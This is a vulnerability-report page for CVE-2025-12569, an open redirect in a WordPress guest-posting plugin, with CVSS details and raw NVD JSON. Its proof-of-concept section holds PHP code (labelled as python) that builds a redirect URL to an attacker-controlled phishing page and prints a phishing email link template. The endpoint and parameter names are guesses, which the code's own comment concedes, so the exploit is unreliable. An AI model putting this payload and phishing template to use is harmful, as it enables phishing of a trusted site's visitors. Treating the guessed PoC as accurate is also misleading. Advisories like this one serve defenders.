Security Vulnerability Report
中文
CVE-2025-12569 CVSS 4.7 MEDIUM

CVE-2025-12569

Published: 2025-11-24 06:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Guest posting / Frontend Posting / Front Editor WordPress plugin before 5.0.0 does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Guest posting / Frontend Posting / Front Editor WordPress插件 < 5.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-12569 PoC - Open Redirect in Guest posting WordPress Plugin // Target: WordPress site with Guest posting / Frontend Posting / Front Editor plugin < 5.0.0 // Malicious URL construction $target_domain = 'victim-site.com'; $malicious_domain = 'attacker-controlled-site.com'; // Attack vector: Inject external URL in redirect parameter // Common parameter names used by the plugin: redirect_to, redirect, url, red $malicious_url = "http://{$target_domain}/wp-content/plugins/guest-posting/" . "includes/submit.php?redirect_to=http://{$malicious_domain}/phishing-page"; echo "[*] CVE-2025-12569 Open Redirect PoC\n"; echo "[*] Target: {$target_domain}\n"; echo "[*] Malicious redirect to: http://{$malicious_domain}/phishing-page\n"; echo "[*] Attack URL:\n{$malicious_url}\n\n"; // HTML email template for phishing attack echo "[*] Phishing email template:\n"; echo "<a href=\"{$malicious_url}\">Click here to view your post</a>\n"; // Note: The actual exploitation requires identifying the correct endpoint // and parameter name used by the vulnerable plugin version. // Check the plugin's source code for redirect handling logic. ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12569", "sourceIdentifier": "[email protected]", "published": "2025-11-24T06:15:46.060", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Guest posting / Frontend Posting / Front Editor WordPress plugin before 5.0.0 does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/37586572-33f9-4365-bfce-7db277a8df72/", "source": "[email protected]"}]}}